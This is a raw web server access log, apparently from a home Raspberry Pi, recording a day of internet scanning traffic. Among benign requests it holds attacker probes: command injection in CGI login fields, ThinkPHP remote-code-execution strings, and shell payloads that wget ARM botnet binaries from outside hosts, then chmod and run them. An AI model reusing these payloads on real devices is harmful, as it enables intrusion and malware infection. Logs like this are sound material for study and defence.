Sat Jun  6 06:25:06 MDT 2020
 06:25:06 up 6 days, 11:33,  1 user,  load average: 0.62, 0.35, 0.35
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               30May20  6days  4:50   0.73s /usr/bin/lxsession -s LXDE-pi -e LXDE
177.124.51.116 - - [06/Jun/2020:12:57:09 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.103.247.164 - - [06/Jun/2020:13:01:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
128.14.209.234 - - [06/Jun/2020:13:27:54 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 "
188.227.174.90 - - [06/Jun/2020:15:40:34 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:35 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:35 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:35 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:35 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:36 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:36 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:36 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:37 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
188.227.174.90 - - [06/Jun/2020:15:40:37 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
93.201.137.132 - - [06/Jun/2020:15:55:35 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0"
93.201.137.132 - - [06/Jun/2020:15:55:42 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
217.61.136.98 - - [06/Jun/2020:17:12:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
162.243.144.59 - - [06/Jun/2020:17:43:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
119.191.125.216 - - [06/Jun/2020:18:01:21 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0"
119.191.125.216 - - [06/Jun/2020:18:01:22 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
113.173.240.66 - - [06/Jun/2020:18:04:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
66.240.205.34 - - [06/Jun/2020:19:02:19 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
103.146.11.250 - - [06/Jun/2020:19:26:31 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0"
103.146.11.250 - - [06/Jun/2020:19:26:32 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
41.38.76.118 - - [06/Jun/2020:19:45:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
36.238.96.24 - - [06/Jun/2020:19:58:03 +0000] "GET / HTTP/1.1" 400 0 "" ""
122.117.117.99 - - [06/Jun/2020:20:13:24 +0000] "GET / HTTP/1.1" 400 0 "" ""
195.54.160.135 - - [06/Jun/2020:20:52:50 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [06/Jun/2020:21:02:55 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [06/Jun/2020:21:02:55 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [06/Jun/2020:21:20:24 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
41.216.186.89 - - [06/Jun/2020:22:46:57 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
212.41.63.13 - - [06/Jun/2020:22:49:22 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
172.254.65.61 - - [06/Jun/2020:22:55:08 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
172.254.65.61 - - [06/Jun/2020:22:55:09 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
172.254.65.61 - - [06/Jun/2020:22:55:15 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
172.254.65.61 - - [06/Jun/2020:22:55:16 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
172.254.65.61 - - [06/Jun/2020:22:55:26 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
190.94.140.84 - - [06/Jun/2020:23:01:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
128.199.200.130 - - [07/Jun/2020:00:12:13 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
195.54.160.135 - - [07/Jun/2020:00:52:52 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
191.100.11.107 - - [07/Jun/2020:04:43:29 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
189.126.95.28 - - [07/Jun/2020:04:47:16 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
83.97.20.21 - - [07/Jun/2020:05:22:06 +0000] "GET / HTTP/1.0" 200 25000 "" ""
85.100.115.111 - - [07/Jun/2020:05:25:57 +0000] "GET / HTTP/1.1" 400 0 "" ""
185.216.140.6 - - [07/Jun/2020:06:08:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
87.202.87.20 - - [07/Jun/2020:06:11:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
91.123.188.188 - - [07/Jun/2020:06:41:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
118.163.114.18 - - [07/Jun/2020:06:45:29 +0000] "GET / HTTP/1.1" 400 0 "" ""
69.161.75.106 - - [07/Jun/2020:07:07:59 +0000] "GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1" 404 0 "" "Mozilla/5.0"
69.161.75.106 - - [07/Jun/2020:07:08:04 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
61.219.11.153 - - [07/Jun/2020:07:41:04 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
49.213.196.105 - - [07/Jun/2020:07:42:22 +0000] "GET / HTTP/1.1" 400 0 "" ""
195.54.160.135 - - [07/Jun/2020:07:45:15 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [07/Jun/2020:07:50:22 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [07/Jun/2020:07:50:24 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [07/Jun/2020:08:02:19 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.233.105.134 - - [07/Jun/2020:08:03:06 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
85.105.74.126 - - [07/Jun/2020:08:21:36 +0000] "GET / HTTP/1.1" 400 0 "" ""
203.160.61.230 - - [07/Jun/2020:08:45:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
191.252.193.79 - - [07/Jun/2020:09:41:41 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
118.24.23.181 - - [07/Jun/2020:09:50:31 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
118.24.23.181 - - [07/Jun/2020:09:50:33 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
118.24.23.181 - - [07/Jun/2020:09:50:35 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
118.24.23.181 - - [07/Jun/2020:09:50:35 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
118.24.23.181 - - [07/Jun/2020:09:50:37 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
118.24.23.181 - - [07/Jun/2020:09:50:38 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
118.24.23.181 - - [07/Jun/2020:09:50:39 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
118.24.23.181 - - [07/Jun/2020:09:50:40 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
118.24.23.181 - - [07/Jun/2020:09:50:41 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
118.24.23.181 - - [07/Jun/2020:09:50:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
195.54.160.135 - - [07/Jun/2020:10:15:04 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.119.110.124 - - [07/Jun/2020:11:26:08 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
192.119.110.124 - - [07/Jun/2020:11:26:08 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.251/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1" 404 0 "" "Hello, world"
79.117.236.85 - - [07/Jun/2020:11:53:28 +0000] "GET / HTTP/1.1" 400 0 "" ""
122.116.117.137 - - [07/Jun/2020:12:06:30 +0000] "GET / HTTP/1.1" 400 0 "" ""
Sun Jun  7 06:25:13 MDT 2020
 06:25:13 up 7 days, 11:33,  1 user,  load average: 0.68, 0.32, 0.32
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               30May20  7days  5:26   0.73s /usr/bin/lxsession -s LXDE-pi -e LXDE